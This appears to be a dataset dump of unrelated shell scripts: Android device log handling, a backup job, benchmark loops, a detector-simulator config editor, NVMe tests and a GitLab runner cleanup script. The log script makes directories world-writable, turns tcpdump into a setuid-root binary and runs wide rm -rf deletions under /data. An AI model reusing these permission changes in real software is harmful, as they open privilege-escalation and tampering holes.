rm -rf /sdcard/oppo_log/log_history.txt
rm -rf /sdcard/oppo_log/*.hprof
rm -rf /sdcard/oppo_log/*.gz
rm -rf /sdcard/oppo_log/xlog
rm -rf /data/oppo_log/*
rm -rf /data/anr/*
rm -rf /data/tombstones/*
rm -rf /data/system/dropbox/*
#can not delete the junk_logs path, kernel needed
mkdir -p /data/oppo_log/junk_logs/kernel
mkdir -p /data/oppo_log/junk_logs/ftrace
mkdir -p /data/oppo_log/junk_logs
chmod -R 777 /data/oppo_log/junk_logs
}
function tranfer(){
mkdir -p /sdcard/oppo_log
mkdir -p /sdcard/oppo_log/compress_log
chmod -R 777 /data/oppo_log/*
cat /data/oppo_log/log_history.txt >> /sdcard/oppo_log/log_history.txt
mv /data/oppo_log/transfer_list.txt /sdcard/oppo_log/transfer_list.txt
rm -rf /data/oppo_log/log_history.txt
mv /data/oppo_log/* /data/media/0/oppo_log/
mv -f /sdcard/tencent/MicroMsg/xlog /sdcard/oppo_log/
chcon -R u:object_r:media_rw_data_file:s0 /data/media/0/oppo_log/
setprop sys.tranfer.finished 1
#can not delete the junk_logs path, kernel needed
mkdir -p /data/oppo_log/junk_logs/kernel
mkdir -p /data/oppo_log/junk_logs/ftrace
mkdir -p /data/oppo_log/junk_logs
chmod -R 777 /data/oppo_log/junk_logs
}
function clearCurrentLog(){
filelist=`cat /sdcard/oppo_log/transfer_list.txt | $XKIT awk '{print $1}'`
for i in $filelist;do
rm -rf /sdcard/oppo_log/$i
done
rm -rf /sdcard/oppo_log/screenshot
rm -rf /sdcard/oppo_log/diag_logs
rm -rf /sdcard/oppo_log/transfer_list.txt
rm -rf /sdcard/oppo_log/description.txt
rm -rf /sdcard/oppo_log/xlog
}
function moveScreenRecord(){
fileName=`getprop sys.screenrecord.name`
zip=.zip
mp4=.mp4
mv -f /data/media/0/oppo_log/${fileName}${zip} /data/media/0/oppo_log/compress_log/${fileName}${zip}
mv -f /data/media/0/oppo_log/screen_record/screen_record.mp4 /data/media/0/oppo_log/compress_log/${fileName}${mp4}
}
function clearDataOppoLog(){
rm -rf /data/oppo_log/*
rm -rf /sdcard/oppo_log/diag_logs/[0-9]*
setprop sys.clear.finished 1
}
function calculateLogSize(){
LogSize1=0
LogSize2=0
if [ -d "${DATA_LOG_PATH}" ]; then
LogSize1=`du -s -k ${DATA_LOG_PATH} | $XKIT awk '{print $1}'`
fi
if [ -d /sdcard/oppo_log/diag_logs ]; then
LogSize2=`du -s -k /sdcard/oppo_log/diag_logs | $XKIT awk '{print $1}'`
fi
LogSize3=`expr $LogSize1 + $LogSize2`
setprop sys.calcute.logsize ${LogSize3}
setprop sys.calcute.finished 1
}
function tranferTombstone() {
srcpath=`getprop sys.tombstone.file`
subPath=`getprop com.oppo.debug.time`
TOMBSTONE_TIME=`date +%F-%H-%M-%S`
cp ${srcpath} /data/oppo_log/${subPath}/tombstone/tomb_${TOMBSTONE_TIME}
}
function tranferAnr() {
srcpath=`getprop sys.anr.srcfile`
subPath=`getprop com.oppo.debug.time`
destfile=`getprop sys.anr.destfile`
cp ${srcpath} /data/oppo_log/${subPath}/anr/${destfile}
}
function cppstore() {
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
srcpstore=`ls /sys/fs/pstore`
subPath=`getprop com.oppo.debug.time`
if [ "${panicenable}" = "${argtrue}" ]; then
if [ "${srcpstore}" != "" ]; then
cp -r /sys/fs/pstore /data/oppo_log/${subPath}/pstore
fi
fi
}
function enabletcpdump(){
mount -o rw,remount,barrier=1 /system
chmod 6755 /system/xbin/tcpdump
mount -o ro,remount,barrier=1 /system
}
#ifdef VENDOR_EDIT
#Yanzhen.Feng@Swdp.Android.OppoDebug.LayerDump, 2015/12/09, Add for SurfaceFlinger Layer dump
function layerdump(){
mkdir -p ${ROOT_AUTOTRIGGER_PATH}
LOGTIME=`date +%F-%H-%M-%S`
ROOT_SDCARD_LAYERDUMP_PATH=${ROOT_AUTOTRIGGER_PATH}/LayerDump_${LOGTIME}
cp -R /data/log ${ROOT_SDCARD_LAYERDUMP_PATH}
rm -rf /data/log
}
#endif /* VENDOR_EDIT */
function junklogcat() {
# echo 1 > sdcard/0.txt
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
# echo 1 > sdcard/1.txt
# echo 1 > ${JUNKLOGPATH}/1.txt
system/bin/logcat -f ${JUNKLOGPATH}/junklogcat.txt -v threadtime *:V
}
function junkdmesg() {
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
system/bin/dmesg > ${JUNKLOGPATH}/junkdmesg.txt
}
function junksystrace_start() {
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
# echo s_start > sdcard/s_start1.txt
#setup
setprop debug.atrace.tags.enableflags 0x86E
# stop;start
adb shell "echo 16384 > /sys/kernel/debug/tracing/buffer_size_kb"
echo nop > /sys/kernel/debug/tracing/current_tracer
echo 'sched_switch sched_wakeup sched_wakeup_new sched_migrate_task binder workqueue irq cpu_frequency mtk_events' > /sys/kernel/debug/tracing/set_event
#just in case tracing_enabled is disabled by user or other debugging tool
echo 1 > /sys/kernel/debug/tracing/tracing_enabled >nul 2>&1
echo 0 > /sys/kernel/debug/tracing/tracing_on
#erase previous recorded trace
echo > /sys/kernel/debug/tracing/trace
echo press any key to start capturing...
echo 1 > /sys/kernel/debug/tracing/tracing_on
echo "Start recordng ftrace data"
echo s_start > sdcard/s_start2.txt
}
function junksystrace_stop() {
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
echo s_stop > sdcard/s_stop.txt
echo 0 > /sys/kernel/debug/tracing/tracing_on
echo "Recording stopped..."
cp /sys/kernel/debug/tracing/trace ${JUNKLOGPATH}/junksystrace
echo 1 > /sys/kernel/debug/tracing/tracing_on
}
#ifdef VENDOR_EDIT
#Zhihao.Li@MultiMedia.AudioServer.FrameWork, 2016/10/19, Add for clean pcm dump file.
function cleanpcmdump() {
rm -rf /sdcard/oppo_log/pcm_dump/*
}
#endif /* VENDOR_EDIT */
#ifdef VENDOR_EDIT
#Jianping.Zheng@Swdp.Android.Stability.Crash, 2016/08/09, Add for logd memory leak workaround
function check_logd_memleak() {
logd_mem=`ps | grep -i /system/bin/logd | $XKIT awk '{print $5}'`
#echo "logd_mem:"$logd_mem
if [ "$logd_mem" != "" ]; then
upper_limit=300000;
if [ $logd_mem -gt $upper_limit ]; then
#echo "logd_mem great than $upper_limit, restart logd"
setprop persist.sys.assert.panic false
setprop ctl.stop logcatsdcard
setprop ctl.stop logcatradio
setprop ctl.stop logcatevent
setprop ctl.stop logcatkernel
setprop ctl.stop tcpdumplog
setprop ctl.stop fingerprintlog
setprop ctl.stop fplogqess
sleep 2
setprop ctl.restart logd
sleep 2
setprop persist.sys.assert.panic true
fi
fi
}
#endif /* VENDOR_EDIT */
case "$config" in
"ps")
Preprocess
Ps
;;
"top")
Preprocess
Top
;;
"server")
Preprocess
Server
;;
"dump")
Preprocess
Dumpsys
;;
"tranfer")
Preprocess
tranfer
;;
"tranfer_tombstone")
tranferTombstone
;;
"logcache")
CacheLog
;;
"logpreprocess")
PreprocessLog
;;
"tranfer_anr")
tranferAnr
;;
"main")
initLogPath
Logcat
;;
"radio")
initLogPath
LogcatRadio
;;
"fingerprint")
initLogPath
LogcatFingerprint
;;
"fpqess")
initLogPath
LogcatFingerprintQsee
;;
"event")
initLogPath
LogcatEvent
;;
"kernel")
initLogPath
LogcatKernel
;;
"tcpdump")
initLogPath
enabletcpdump
tcpdumpLog
;;
"clean")
CleanAll
;;
"clearcurrentlog")
clearCurrentLog
;;
"calcutelogsize")
calculateLogSize
;;
"cleardataoppolog")
clearDataOppoLog
;;
"movescreenrecord")
moveScreenRecord
;;
"cppstore")
initLogPath
cppstore
;;
"screen_record")
initLogPath
screen_record
;;
#ifdef VENDOR_EDIT
#Yanzhen.Feng@Swdp.Android.OppoDebug.LayerDump, 2015/12/09, Add for SurfaceFlinger Layer dump
"layerdump")
layerdump
;;
#endif /* VENDOR_EDIT */
"dumpstate")
Preprocess
Dumpstate
;;
"enabletcpdump")
enabletcpdump
;;
"dumpenvironment")
DumpEnvironment
;;
"initcache")
initcache
;;
"logcatcache")
logcatcache
;;
"radiocache")
radiocache
;;
"eventcache")
eventcache
;;
"kernelcache")
kernelcache
;;
"tcpdumpcache")
tcpdumpcache
;;
"fingerprintcache")
fingerprintcache
;;
"fplogcache")
fplogcache
;;
"log_observer")
log_observer
;;
"junklogcat")
junklogcat
;;
"junkdmesg")
junkdmesg
;;
"junkststart")
junksystrace_start
;;
"junkststop")
junksystrace_stop
;;
#ifdef VENDOR_EDIT
#Zhihao.Li@MultiMedia.AudioServer.FrameWork, 2016/10/19, Add for clean pcm dump file.
"cleanpcmdump")
cleanpcmdump
;;
#endif /* VENDOR_EDIT */
#ifdef VENDOR_EDIT
#Jianping.Zheng@Swdp.Android.Stability.Crash, 2016/08/09, Add for logd memory leak workaround
"check_logd_memleak")
check_logd_memleak
;;
#endif /* VENDOR_EDIT *
*)
tranfer
;;
esac
| true |
f545f058392b8cfd98d494ab9e29d79cf5c17761 | Shell | xMonny/Operating_systems_course | /Exercise-shell/05-b-9100.sh | UTF-8 | 1,035 | 3.984375 | 4 | [] | no_license | #!/bin/bash
if [ "$#" -ne 2 ]; then
echo "Invalid number of arguments"
exit 1
fi
SOURCE="${1}"
DESTINATION="${2}"
if ! [ -d "${SOURCE}" ]; then
echo "Invalid name of source directory"
exit 2
fi
if ! [ -d "${DESTINATION}" ]; then
echo "Invalid name of destination directory"
exit 3
fi
if ! [ -r "${SOURCE}" ]; then
echo "Source directory doesn't have read permissions"
exit 4
fi
if ! [ -r "${DESTINATION}" ]; then
echo "Destination directory doesn't have read permissions"
exit 5
fi
if ! [ -w "${DESTINATION}" ]; then
echo "Destination directory doesn't have write permissions"
exit 6
fi
while read -d $'\0' file
do
BASE_NAME=$(basename "${file}")
EXTENSION=$(echo "${BASE_NAME}" | egrep "^[^\.]+\.[^\.]+$" | cut -d '.' -f2)
find "${DESTINATION}" -mindepth 1 -maxdepth 1 -type d 2>/dev/null | grep -q "^${EXTENSION}$"
if [ "$?" -ne 0 ]; then
mkdir "${DESTINATION}"/"${EXTENSION}" 2>/dev/null
fi
cp "${file}" "${DESTINATION}"/"${EXTENSION}" 2>/dev/null
done< <(find "${SOURCE}" -type f -print0 2>/dev/null)
| true |
3078566e21e2ad0e30830d8f3d09ba66ce85b49a | Shell | Vahel123/Abschlussarbeit | /DataAnalyze/KomponnentenTest/Benchmark/DockerContainer/CPU_Test/Benchmark_CPU_Test.sh | UTF-8 | 423 | 3.015625 | 3 | [] | no_license | #/bash/bin!
# Benchmark-CPU
# docker exec -it 2da8db12b3a7 sysbench --num-threads=1 --test=cpu --cpu-max-prime=20000 run && timeout 30 bash -c -- 'while true; do cat /proc/stat | head -n1 >> CPU_Test_fuer_Docker_Container_1.csv ;done'
i=1
while [ $i -le 25 ]
do
sysbench --num-threads=1 --test=cpu --cpu-max-prime=20000 run | head -n15 | tail -n1 >> CPU_Test_fuer_Docker_Container.csv
sleep 30s
i=`expr $i + 1`
done
| true |
52ad46ef02c162507f5926ead224fb40f193b055 | Shell | pmh905001/scripts | /detector-simulator/config-detsim.sh | UTF-8 | 4,908 | 3.28125 | 3 | [] | no_license | #! /bin/bash
#This script is used to update the detector simulator.
#Usage: config-detsim.sh detectorIP broadcastIP
#For example : config-detsim.sh 3.136.143.68 3.136.143.255
if [ $# != 2 ]
then
echo -e "\e[1;31m Need 2 parameters \e[0m"
echo Usage:
echo $0 \<detectorIP\> \<broadcastIP\>
exit 1
fi
#path1="ConnectionPoint.cfg"
#path2="XRImDet.dyn"
#path3="start.applications"
#path4="kilall"
#path5="VersionInfo.txt"
path1="/magichome/xruser/config/IDC/Application/ConnectionPoint.cfg"
path2="/magichome/xruser/config/XRImDet.dyn"
path3="/magichome/xruser/bin/start.magic"
path4="/magichome/xruser/bin/kilall"
path5="/magichome/xruser/install/detector_fw/iDR/VersionInfo.txt"
existStr=`grep -c 'iDR:' $path1`
if [ $existStr == 1 ]
then
numberIDR=`grep 'iDR:' $path1 -n | awk -F: '{print $1}'`
let num=numberIDR+8
echo $path1 : $num
#Just print the changed line
#sed -n "${num}s/DetectorIP.*/DetectorIP = \"$1\";/pg" $path1
sed -i "${num}s/DetectorIP.*/DetectorIP = \"$1\";/g" $path1
let num=num+1
echo $path1 : $num
#sed -n "${num}s/Detector_SysIP.*/Detector_SysIP = \"$1\";/pg" $path1
sed -i "${num}s/Detector_SysIP.*/Detector_SysIP = \"$1\";/g" $path1
let num=num+1
echo $path1 : $num
#sed -n "${num}s/BroadcastAddress.*/BroadcastAddress = \"$2\";/pg" $path1
sed -i "${num}s/BroadcastAddress.*/BroadcastAddress = \"$2\";/g" $path1
dos2unix $path1
else
echo -e "\e[1;31m Not exist key word in $path1 \e[0m"
fi
existStr=`grep -c '\[CP_WIFI_1\]' $path2`
if [ $existStr == 1 ]
then
numberIDR=`grep '\[CP_WIFI_1\]' $path2 -n | awk -F: '{print $1}'`
let num=numberIDR+7
echo $path2 : $num
#sed -n "${num}s/DetectorConnectionStrategy.Val = 1/DetectorConnectionStrategy.Val = 0/pg" $path2
sed -i "${num}s/DetectorConnectionStrategy.Val = 1/DetectorConnectionStrategy.Val = 0/g" $path2
else
echo -e "\e[1;31m Not exist key word in $path2 \e[0m"
fi
existStr=`grep -c 'sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh' $path3`
if [ $existStr == 0 ]
then
echo "$path3 : "
#sed -n "$ a sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh" $path3
sed -i "$ a sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh" $path3
else
echo -e "\e[1;31m Already exist key word in $path3 \e[0m"
fi
existStr=`grep -c 'sudo /magichome/xruser/detsim/bin/kildetsim.sh' $path4`
if [ $existStr == 0 ]
then
echo "$path4 : "
#sed -n "$ a sudo /magichome/xruser/detsim/bin/kildetsim.sh" $path4
sed -i "$ a sudo /magichome/xruser/detsim/bin/kildetsim.sh" $path4
else
echo -e "\e[1;31m already exist key word in $path4 \e[0m"
fi
#256f0612
existStr=`grep -c '256f0612' $path5`
if [ $existStr == 0 ]
then
echo "$path5 : "
sed -i "1 c 256f0612" $path5
else
echo -e "\e[1;31m Already existed key word in $path5 \e[0m"
fi
#Restart App
#Kilall;start.magic
#when you see detector boots up successfully, execute this command:
#/magichome/xruser/bin/copyiDRCalFiles.sh
##############################################################################################
#Description
##############################################################################################
#Open a terminal
#su //to change to superuser
#service ip
# vi /magichome/xruser/config/IDC/Application/ConnectionPoint.cfg
#Scroll to the bottom,
#Update IP of detector, like below:
#iDR:
#{
# eth0:
# {
# DetectorPanelId = "UNKNOWN";
# DetectorType = "UNKNOWN";
# Detector_HostPort = 5550;
# Detector_ImagePort = 6660;
# DetectorIP = "3.136.143.17"; #change to real eth1 ip and bcast
# Detector_SysIP = "3.136.143.17";
# BroadcastAddress = "3.136.143.255";
# BroadcastPort = 8100;
# BroadcastInterval = 2;
# BroadcastTimeout = 20;
# SystemPort = 4500;
# EthernetInterface = "eth0";
# };
#};
# vi /magichome/xruser/config/XRImDet.dyn
#Update CP_WIFI_1, like below:
#[CP_WIFI_1]
#DetcommMedium.Type = String
#DetcommMedium.Val = eth0
#PowerSupplyInfo.Type = String
#PowerSupplyInfo.Val = DCRegulated
#DetectorConnectionStrategy.Type = Number
#DetectorConnectionStrategy.Val = 0 #change from 1 to 0
#DetectorConnectionType.Type = String
#DetectorConnectionType.Val = CONNECT_WIFI
#SupportedDetectorTypes.Type = StringList
#SupportedDetectorTypes.Val = { iDR }
# vi /magichome/xruser/bin/start.magic
#Add these to the end:
#to start detsim
#sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh
# vi /magichome/xruser/bin/kilall
#Add these to the end:
#to kill detsim
#sudo /magichome/xruser/detsim/bin/kildetsim.sh
# vi /magichome/xruser/install/detector_fw/iDR/VersionInfo.txt
#Change the content to 256f0612
# Restart App
#Kilall;start.magic
# when you see detector boots up successfully, execute this command:
#/magichome/xruser/bin/copyiDRCalFiles.sh
| true |
4b8393a0508fde57dd167891d2f56195f4f393c9 | Shell | Aminuxer/PS-RedSystem-Linux | /Backups/backup.sh | UTF-8 | 896 | 3.25 | 3 | [] | no_license | #!/bin/bash
date=`date "+%Y_%m_%d"`; # current date
days_store='12'; # Number of backups (N last days)
dir_open=/Backups/Data # directory for store backups
tgz_bin='tar --acls -p --xattrs --label="PayTerm1" --gzip -cf '; # Tar/GZip binary + options
echo "=== BackUp script for PayTerm1 === [$date] ";
mkdir $dir_open/$date
sync
echo 'Make open archives ...';
cd $dir_open/$date
$tgz_bin PT1_home.tgz /home/terminal /home/backuper /root
$tgz_bin PT1_etc.tgz /etc/sysconfig/iptables* /var/spool/cron /etc/ssh /etc/rc.d/rc.local /etc/passwd /etc/group /etc/X11
cd $dir_open/$date && sha256sum * > _WPT1.sha256
sync
cd /
echo 'Delete old backups ...';
find $dir_open/ -mtime +$days_store -delete # store backups for N last days
echo "=== BackUp script complete ===== [$date]";
sync;
sleep 5;
cp /Backups/backup.log $dir_open/$date
| true |
de028e712b0f00ce87b886af5cc1821d64e6f19b | Shell | luyong6/snap | /actions/hdl_nvme_example/tests/test_0x10140001.sh | UTF-8 | 8,224 | 3.59375 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# Copyright 2017 International Business Machines
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
card=0
version=0.3
reset=0
threads=1
nblocks=2
prefetch=0
random_seed=0
duration="NONE"
options="-n 0x40000"
TEST="NONE"
# output formatting
bold=$(tput bold)
normal=$(tput sgr0)
export PATH=.:`pwd`/actions/hdl_nvme_example/sw:`pwd`/software/tools:${PATH}
export LD_LIBRARY_PATH=.:`pwd`/actions/hdl_nvme_example/sw:`pwd`/software/lib:${LD_LIBRARY_PATH}
function usage() {
echo "Usage: $PROGRAM"
echo " [-V] print version"
echo " [-h|-?] help"
echo " [-C <0..3>] card number"
echo " [-d SHORT/NORMAL/LONG] duration of tests"
echo " [-r] card reset (sudo needed)"
echo " [-n <lbas>] number of lbas to try, e.g. 0x40000 for 1 GiB"
echo " [-b <nblocks>] number of blocks per transfer"
echo " [-t <threads>] threads to be used"
echo " [-H <threads>] hardware threads per CPU to be used (see ppc64_cpu)"
echo " [-p <prefetch>] 0/1 disable/enable prefetching"
echo " [-R <seed>] random seed, if not 0, random read odering"
echo " [-T <testcase>] testcase e.g. NONE, CBLK, READ_BENCHMARK, PERF, READ_WRITE ..."
echo
echo " Perform SNAP card initialization and action_type "
echo " detection. Initialize NVMe disk 0 and 1 if existent."
echo
}
function reset_card() {
echo -n "Resetting card ${card} (takes a while) "
sudo bash -c "echo 100000 > /sys/kernel/debug/powerpc/eeh_max_freezes"
sudo bash -c "echo 1 > /sys/class/cxl/card${card}/reset"
for ((i=0;i<20;i++)); do
sleep 1
echo -n "."
done
echo " OK"
echo -n "Check if card reappeared ... "
ls -l /dev/cxl/afu${card}.0 > /dev/null
if [ $? -ne 0 ]; then
echo "recovery failed, sorry!"
exit 1;
else
echo "OK"
fi
}
while getopts ":H:A:b:C:d:T:t:R:n:p:rVvh" opt; do
case ${opt} in
C)
card=${OPTARG};
if [[ $card -gt 3 ]]; then
echo "Invalid option for -C -$OPTARG" >&2
usage
fi
;;
V)
echo "${version}" >&2
exit 0
;;
T)
TEST=${OPTARG}
;;
b)
nblocks=${OPTARG}
;;
t)
threads=${OPTARG}
;;
H)
hw_threads=${OPTARG}
sudo ppc64_cpu --smt=${hw_threads}
ppc64_cpu --smt
;;
d)
duration=${OPTARG}
TEST="READ_BENCHMARK"
;;
n)
options="-n ${OPTARG}"
;;
R)
random_seed=${OPTARG}
;;
p)
prefetch=${OPTARG}
;;
r)
reset=1;
;;
h)
usage;
exit 0;
;;
\?)
printf "${bold}ERROR:${normal} Invalid option: -${OPTARG}\n" >&2
exit 1
;;
:)
printf "${bold}ERROR:${normal} Option -$OPTARG requires an argument.\n" >&2
exit 1
;;
esac
done
shift $((OPTIND-1))
# now do something with $@
which snap_maint 2>&1 > /dev/null
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Path not pointing to required binaries (snap_maint, snap_nvme_init)!\n" >&2
exit 1
fi
if [ $reset -eq 1 ]; then
reset_card
fi
snap_maint -C${card} -v
snap_nvme_init -C${card} -d0 -d1 -v
function nvme_read_benchmark () {
echo "SNAP NVME READ BENCHMARK"
for s in UP DOWN UPDOWN ; do
for p in 0 1 4 8 ; do
for t in 1 2 4 8 10 14 16 32 ; do
echo "PREFETCH: $p ; THREADS: $t ; NBLOCKS=${nblocks} ; STRATEGY=${s}" ;
(time CBLK_PREFETCH=$p CBLK_STRATEGY=${s} \
snap_cblk -C0 ${options} -b${nblocks} \
-R${random_seed} -s0 -t${t} \
--read /dev/null );
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} bad exit code!\n" >&2
exit 1
fi
echo
done
done
done
}
function cblk_read_write () {
echo "SNAP NVME READ WRITE"
for s in UP DOWN UPDOWN ; do
for p in 0 1 4 8 ; do
for t in 1 2 4 8 10 14 16 32 ; do
echo "PREFETCH: $p ; THREADS: $t ; NBLOCKS=${nblocks} ; STRATEGY=${s}" ;
(time CBLK_PREFETCH=$p CBLK_STRATEGY=${s} \
snap_cblk -C0 ${options} -b${nblocks} \
-R${random_seed} -s0 -t${t} \
--rw /dev/null );
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} bad exit code!\n" >&2
exit 1
fi
echo
done
done
done
}
function perf_test () {
echo "SNAP NVME PERF BENCHMARK"
for p in 0 4 ; do
for t in 1 8 16 32 ; do
perf_log="snap_nvme_prefetch_${p}_threads_${t}.log"
echo "PREFETCH: $p ; THREADS: $t ; NBLOCKS=${nblocks}" ;
sudo -E -- perf record -a -g -- \
CBLK_PREFETCH=$p \
snap_cblk -C0 ${options} -b${nblocks} \
-R${random_seed} -s0 -t${t} \
--read /dev/null ;
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} bad exit code!\n" >&2
exit 1
fi
echo
echo -n "Generating perf output ${perf_log} ... "
sudo perf report -f > $perf_log
echo "OK"
done
done
}
function cblk_test () {
export CBLK_PREFETCH=${prefetch}
for nblocks in 1 2 ; do
echo "### (1.${nblocks}) Formatting using ${nblocks} block increasing pattern ..."
snap_cblk -C${card} ${options} -t${threads} -b${nblocks} --format --pattern ${nblocks}
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Cannot format NVMe device!\n" >&2
exit 1
fi
echo "# Reading using 32 blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b32 --read cblk_read.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
printf "${bold}NOTE:${normal} Please manually inspect if pattern is really ${nblocks}\n"
hexdump cblk_read.bin
echo
done
echo "### (2) Formatting using 2 blocks increasing pattern ..."
snap_cblk -C${card} ${options} -t${threads} -b2 --format --pattern INC
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Cannot format NVMe device!\n" >&2
exit 1
fi
echo "# Reading using 1 block ..."
snap_cblk -C${card} ${options} -t${threads} -b1 --read cblk_read1.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
echo "# Reading using 2 blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b2 --read cblk_read2.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
echo "Compare results ..."
diff cblk_read1.bin cblk_read2.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Data differs!\n" >&2
exit 1
fi
echo
for nblocks in 1 2 4 8 16 32 ; do
echo "### (3.${nblocks}) Writing 2 blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b2 --write cblk_read2.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Writing NVMe device!\n" >&2
exit 1
fi
echo "# Reading ${nblocks} blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b${nblocks} --read cblk_read3.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
echo "Compare results ..."
diff cblk_read2.bin cblk_read3.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Data differs!\n" >&2
exit 1
fi
echo
done
echo "SUCCESS"
}
if [ "${TEST}" == "READ_BENCHMARK" ]; then
nvme_read_benchmark
fi
#
# System p specific performance counter registers. Try this if you do
# not know what it means.
#
# perf stat -e "{r100F8,r2D01A,r30004,r4E010},{r100F8,r2D01E,r30004,r4D01C},{r100F8,r2D01C,r30004,r4D01A},{r100F8,r2E010,r30004,r4D01E},{r100F8,r2001A,r30028,r4000A},{r1001C,r2D018,r30036,r4D018},{r100F8,r2D012,r30028,r4000A},{r1001C,r2D016,r30038,r4D016},{r100F8,r2D014,r30026,r4D012},{r1001C,r2D010,r30038,r4D010},{r100F8,r2C010,r30004,r4000A},{r1001C,r2C012,r30004,r4C01A},{r100F8,r2C016,r30004,r4C016},{r1001C,r2C01C,r30004,r4C01A},{r100F8,r2C018,r30004,r4C018},{r10036,r2C01A,r30036,r4C010},{r1001C,r2E01E,r30028,r4C014},{r1001C,r2001A,r30038,r4C012},{r1001C,r2C014,r30026,r4D014},{r1001C,r2C010,r30038,r4C01C}" <command>
#
if [ "${TEST}" == "PERF" ]; then
perf_test
fi
if [ "${TEST}" == "CBLK" ]; then
cblk_test
fi
if [ "${TEST}" == "READ_WRITE" ]; then
cblk_read_write
fi
exit 0
| true |
4809b01960c822ef5f4f5af12dca1e60fa4f5db5 | Shell | restlessmodem/scripts | /protonvpnStatus.sh | UTF-8 | 599 | 3.09375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Script used by polybar for protonvpn widget
protonvpn status > /tmp/protonStatus
status=$(cat /tmp/protonStatus | grep Status | cut -d ":" -f2 | tr -d " ")
server=$(cat /tmp/protonStatus | grep Server | cut -d ":" -f2 | tr -d " ")
protocol=$(cat /tmp/protonStatus | grep Protocol | cut -d ":" -f2 | tr -d " ")
load=$(cat /tmp/protonStatus | grep Load | cut -d ":" -f2 | tr -d " ")
ks=$(cat /tmp/protonStatus | grep "Kill Switch" | cut -d ":" -f2 | tr -d " ")
if [ $status == "Connected" ]; then
echo "VPN $status ($protocol) - $server - $load"
else
echo "VPN disconnected"
fi
| true |
ce579ff0478a9d9616b505a0ed1ac76552b56f1a | Shell | danielthoren/Config-files | /shell/bash/conf.sh | UTF-8 | 581 | 4.125 | 4 | [] | no_license | #!/bin/bash
workingDir=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
dir=$HOME
fname='.bash_init.sh'
# Make sure common bash is installed
bash "$workingDir/../common_bash/conf.sh"
echo "Configuring bash in $dir"
if [ -f ${dir}/${fname} ]; then
echo "Bash config link exists, removing..."
rm "${dir}/${fname}"
fi
ln -s "$workingDir/bash_files/bash_init.sh" "${dir}/${fname}"
if ! grep $fname ~/.bashrc; then
echo "Inserting source of .bash_init.sh into .bashrc"
echo "source $dir/${fname}" >> ~/.bashrc
fi
echo "Done configuring bash"
| true |
39a09d7d92baf4d7b3c861d4cafc679e6ecd70d2 | Shell | vntkumar8/mail-server | /send_console | UTF-8 | 1,208 | 3.609375 | 4 | [
"MIT"
] | permissive | #!/bin/sh
printf "===========================================\n\t\tSMTP MAIL SERVER\t\t\n===========================================\n"
#printf "Sender's Email ID : "
c=$(wc -l < old_mails)
zenity --forms --title="SMTP Send Mail Console" \
--text="Enter required information" \
--separator="$" \
--add-entry="Your Email Address" \
--add-entry="Recipient's Email Address" \
--add-entry="Your Message " > mbook.csv 2> /dev/null
case $? in
0)
echo "trying to send mail...";;
1)
echo "No mail sent."
;;
-1)
echo "An unexpected error has occurred."
;;
esac
sender=$(cut mbook.csv -d '$' -f1)
receiver=$(cut mbook.csv -d '$' -f2)
tbody=$(cut mbook.csv -d '$' -f3)
#echo $sender $receiver $tbody
swaks -h domain.com -f $sender -t $receiver --body $tbody -s localhost -p 2525 > sender.log
lno=$(wc -l < sender.log)
if [ $lno -gt 20 ]
then
notify-send "Mail Sent to $receiver"
else echo "There was some trouble.
Kindly check the sender.log file for details about problem"
fi
## read receipts
while [ 2 -gt 1 ]
do
d=$(wc -l < old_mails)
if [ $c != $d ]
then
printf "Your Mail was read by receipient $receiver at "
date -r old_mails
break
fi
done;
| true |
cee33156ac6dd7561be5a3bcd03f593a64bb4b54 | Shell | slamdev/polyglot-monorepo-playground | /ops/gitlab-runner/deploy/docker/runner/shutdown.sh | UTF-8 | 1,154 | 3.703125 | 4 | [] | no_license | #!/usr/bin/env bash
set -e
URL=${CI_SERVER_URL}/api/v4
RUNNER_TOKEN=`grep token /etc/gitlab-runner/config.toml | cut -d '"' -f 2`
echo "Runner token is ${RUNNER_TOKEN}"
EXISTING_RUNNERS=`curl --header "PRIVATE-TOKEN: ${PERSONAL_ACCESS_TOKENS}" "${URL}/runners/all" | \
jq ".[] | select(.description == \"${RUNNER_NAME}\") | .id"`
echo "Existing runners are ${EXISTING_RUNNERS}"
RUNNER_ID=""
